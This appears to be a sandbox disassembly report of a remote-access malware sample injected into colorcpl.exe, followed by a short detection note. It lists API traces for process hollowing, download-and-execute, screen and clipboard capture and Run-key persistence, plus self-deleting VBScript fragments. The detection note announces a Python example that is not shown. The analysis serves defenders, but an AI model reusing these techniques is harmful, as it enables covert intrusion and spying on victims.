                                        • GetACP.KERNEL32(?,?,04ACF93B,?,00000000), ref: 04ACF6F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 14698026cadb5bb64c9ae7f91d903ebfd5db3be6e2dec4bc4e429fe7ba34eb3a
                                        • Instruction ID: 1079fc38effabd74adf6fc10e8b5930314e750a6cba85091b2a887c070c4b087
                                        • Opcode Fuzzy Hash: 14698026cadb5bb64c9ae7f91d903ebfd5db3be6e2dec4bc4e429fe7ba34eb3a
                                        • Instruction Fuzzy Hash: 6921B632700141AED7708F64C900B97B3ABEB48B54B56842DF95ADB1A4F732FE40C790
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 04A994A4
                                        • LoadResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994B8
                                        • LockResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994BF
                                        • SizeofResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A887A5
                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 04A8881D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A88846
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04A8885D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC5784
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5791
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04ACF8FC
                                        • IsValidCodePage.KERNEL32(00000000), ref: 04ACF957
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 04ACF966
                                        • GetLocaleInfoW.KERNEL32(?,00001001,04AC1F7E,00000040,?,04AC209E,00000055,00000000,?,?,00000055,00000000), ref: 04ACF9AE
                                        • GetLocaleInfoW.KERNEL32(?,00001002,04AC1FFE,00000040), ref: 04ACF9CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID:
                                        • API String ID: 745075371-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A8784D
                                        • FindFirstFileW.KERNEL32(00000000,?,04AE32A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A87906
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8792E
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A8793B
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A87A51
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                        • String ID:
                                        • API String ID: 1771804793-0
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04A864D2
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 04A865B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe$open
                                        • API String ID: 2825088817-1189844230
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 04A9A861
                                          • Part of subcall function 04A9215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04A9216E
                                          • Part of subcall function 04A9215F: RegSetValueExA.KERNEL32(?,04AE4150,00000000,?,00000000,00000000,04AF2200,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A92196
                                          • Part of subcall function 04A9215F: RegCloseKey.ADVAPI32(?,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A921A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04AC1F85,?,?,?,?,04AC19DC,?,00000004), ref: 04ACEF9A
                                        • _wcschr.LIBVCRUNTIME ref: 04ACF02A
                                        • _wcschr.LIBVCRUNTIME ref: 04ACF038
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04AC1F85,00000000,04AC20A5), ref: 04ACF0DB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID:
                                        • API String ID: 4212172061-0
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 04AB99A4
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04AB99AE
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 04AB99BB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000,?,04AC3648,00000003), ref: 04AC07D6
                                        • TerminateProcess.KERNEL32(00000000,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000,?,04AC3648,00000003), ref: 04AC07DD
                                        • ExitProcess.KERNEL32 ref: 04AC07EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 04A8A65D
                                        • GetClipboardData.USER32(0000000D), ref: 04A8A669
                                        • CloseClipboard.USER32 ref: 04A8A671
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseDataOpen
                                        • String ID:
                                        • API String ID: 2058664381-0
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 04AB29F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,04AB262F), ref: 04AB2901
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 04A96474
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A96477
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 04A96488
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9648B
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 04A9649C
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9649F
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 04A964B0
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A964B3
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04A96555
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 04A9656D
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 04A96583
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 04A965A9
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04A9662B
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 04A9663F
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 04A9667F
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04A96749
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 04A96766
                                        • ResumeThread.KERNEL32(?), ref: 04A96773
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04A9678A
                                        • GetCurrentProcess.KERNEL32(?), ref: 04A96795
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 04A967B0
                                        • GetLastError.KERNEL32 ref: 04A967B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                        • API String ID: 4188446516-108836778
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 04A96E98
                                        • CreateCompatibleDC.GDI32(00000000), ref: 04A96EA5
                                          • Part of subcall function 04A972DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04A9730F
                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 04A96F1B
                                        • DeleteDC.GDI32(00000000), ref: 04A96F32
                                        • DeleteDC.GDI32(00000000), ref: 04A96F35
                                        • DeleteObject.GDI32(00000000), ref: 04A96F38
                                        • SelectObject.GDI32(00000000,00000000), ref: 04A96F59
                                        • DeleteDC.GDI32(00000000), ref: 04A96F6A
                                        • DeleteDC.GDI32(00000000), ref: 04A96F6D
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 04A96F91
                                        • GetIconInfo.USER32(?,?), ref: 04A96FC5
                                        • DeleteObject.GDI32(?), ref: 04A96FF4
                                        • DeleteObject.GDI32(?), ref: 04A97001
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 04A9700E
                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 04A97026
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 04A97095
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 04A97104
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04A97128
                                        • DeleteDC.GDI32(?), ref: 04A9713C
                                        • DeleteDC.GDI32(00000000), ref: 04A9713F
                                        • DeleteObject.GDI32(00000000), ref: 04A97142
                                        • GlobalFree.KERNEL32(?), ref: 04A9714D
                                        • DeleteObject.GDI32(00000000), ref: 04A97201
                                        • GlobalFree.KERNEL32(?), ref: 04A97208
                                        • DeleteDC.GDI32(?), ref: 04A97218
                                        • DeleteDC.GDI32(00000000), ref: 04A97223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 479521175-865373369
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 04A8C0D6
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 04A8C0E9
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 04A8C102
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 04A8C132
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A89305,00000000,04AF21E8,04A8BC76,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A801
                                          • Part of subcall function 04A8A7F2: UnhookWindowsHookEx.USER32(?), ref: 04A8A811
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A892EF,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A823
                                          • Part of subcall function 04A9A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8C37D
                                        • ExitProcess.KERNEL32 ref: 04A8C389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-1536747724
                                        • Opcode ID: 4c2703993d4ac7a83cfefde7a6f45f3496a08aa0fc2f54b305053ecc915d4785
                                        • Instruction ID: 117086953eca534c3815472c541d1486d63ec6e72c5d0466667b4cdf112e60a4
                                        • Opcode Fuzzy Hash: 4c2703993d4ac7a83cfefde7a6f45f3496a08aa0fc2f54b305053ecc915d4785
                                        • Instruction Fuzzy Hash: 5891C3722042006BF718FBA1DE90EFF77E9EF90218F40092DE55697191EE21BD0ACB52
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BD63
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 04A8BD76
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BDA6
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BDB5
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A89305,00000000,04AF21E8,04A8BC76,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A801
                                          • Part of subcall function 04A8A7F2: UnhookWindowsHookEx.USER32(?), ref: 04A8A811
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A892EF,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A823
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8BFD0
                                        • ExitProcess.KERNEL32 ref: 04A8BFD7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$05#v`#v$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-2323060813
                                        • Opcode ID: f5b2876144d31d17e63b424c04b79590ff63930282891d2a0ca3ecb60fdaa664
                                        • Instruction ID: c4504ab9dcaadbc635a3e8650c510c429b8bf6321e5150f2382b23e590c8bd9a
                                        • Opcode Fuzzy Hash: f5b2876144d31d17e63b424c04b79590ff63930282891d2a0ca3ecb60fdaa664
                                        • Instruction Fuzzy Hash: 8C81D4726042406BFB18FB61D990EBF77E8EFA0208F10082DF55697191EE74BD0AC752
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,04AF2200,04AF1FFC,00000000), ref: 04A90EF9
                                        • ExitProcess.KERNEL32(00000000), ref: 04A90F05
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04A90F7F
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04A90F8E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04A90F99
                                        • CloseHandle.KERNEL32(00000000), ref: 04A90FA0
                                        • GetCurrentProcessId.KERNEL32 ref: 04A90FA6
                                        • PathFileExistsW.SHLWAPI(?), ref: 04A90FD7
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 04A9103A
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 04A91054
                                        • lstrcatW.KERNEL32(?,.exe), ref: 04A91066
                                          • Part of subcall function 04A9A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04A910A6
                                        • Sleep.KERNEL32(000001F4), ref: 04A910E7
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04A910FC
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04A91107
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9110E
                                        • GetCurrentProcessId.KERNEL32 ref: 04A91114
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2649220323-3088914985
                                        • Opcode ID: 31bf563cd36b0229f3e25b6f26c81d99e7a88ec9081f44d99908b37f2116350e
                                        • Instruction ID: ba42829b2ff646ce06a3af5dfa04f8c946c737c6c16624178669c234d83acf3f
                                        • Opcode Fuzzy Hash: 31bf563cd36b0229f3e25b6f26c81d99e7a88ec9081f44d99908b37f2116350e
                                        • Instruction Fuzzy Hash: 8C51A172A05219BBFF10BBA09D58EFE33FCEB04614F0045A5F502A71C1EF75AE468A60
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 04A990F2
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 04A99106
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,04AE3050), ref: 04A9912E
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,04AF1E78,00000000), ref: 04A99144
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 04A99185
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 04A9919D
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 04A991B2
                                        • SetEvent.KERNEL32 ref: 04A991CF
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 04A991E0
                                        • CloseHandle.KERNEL32 ref: 04A991F0
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 04A99212
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 04A9921C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 738084811-1354618412
                                        • Opcode ID: 2a44e3dfcd6e51a001cb81386934909fe46993a2e5f9f78c6a8e688499b9c2d0
                                        • Instruction ID: 82e265980fcd744f1ffdd5401645945c8a85fe057a3bf40cdded30228b44e603
                                        • Opcode Fuzzy Hash: 2a44e3dfcd6e51a001cb81386934909fe46993a2e5f9f78c6a8e688499b9c2d0
                                        • Instruction Fuzzy Hash: 9651B2B1204204BFFA14FB71DD95EBF37ECEB91298F50011EB05656190EE25BD0ACA62
                                        APIs
                                        • _wcslen.LIBCMT ref: 04A8B882
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,04AF1FFC), ref: 04A8B89B
                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,04AF1FFC), ref: 04A8B952
                                        • _wcslen.LIBCMT ref: 04A8B968
                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000), ref: 04A8B9E0
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 04A8BA22
                                        • _wcslen.LIBCMT ref: 04A8BA25
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 04A8BA3C
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8BC2A
                                        • ExitProcess.KERNEL32 ref: 04A8BC36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                        • String ID: """, 0$6$C:\Windows\SysWOW64\colorcpl.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 2743683619-306929222
                                        • Opcode ID: 36557e1a6f2dfabeb804c2b15178cd8bfefe510a9937f5f4d8ef12339d2a26df
                                        • Instruction ID: ac9970a4c2d17204819a7dfef4ad7bada2a5055f838e9ed7db3cb750358f6f47
                                        • Opcode Fuzzy Hash: 36557e1a6f2dfabeb804c2b15178cd8bfefe510a9937f5f4d8ef12339d2a26df
                                        • Instruction Fuzzy Hash: 4A91C2712083406BF618F7A1DE50EFF7398EFA4218F50041DF55697191EE30BD4AC662
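The three functions above (the two `update.vbs` uninstall routines, the mutex-guarded update routine and this `install.vbs` routine) share one set of host artefacts: a VBScript assembled from the `On Error Resume Next` / `Set fso = CreateObject("Scripting.FileSystemObject")` / `while fso.FileExists(` / `fso.DeleteFile(Wscript.ScriptFullName)` fragments is written under `Temp` as `\install.vbs` or `\update.vbs` and launched through ShellExecuteW with the `open` verb; the legitimate `C:\Windows\SysWOW64\colorcpl.exe` is copied into a newly created directory; the `Run\` and `Policies\Explorer\Run\` keys are touched; and the update routine names its dropped executable with GetTempFileNameW(prefix `temp_`) followed by lstrcatW(`.exe`). Because GetTempFileNameW keeps only the first three characters of the prefix, that name takes the form `tem<hex>.tmp.exe` (inferred: the trace does not show that the `.exe` concatenation targets the same buffer, so treat that rule as an assumption). The Python below is an added detection example, not content from the Joe Sandbox report or code from the sample; it runs these checks over constructed Sysmon-like events, and the list of folders a Run value should not point into is an assumption to tune per environment.
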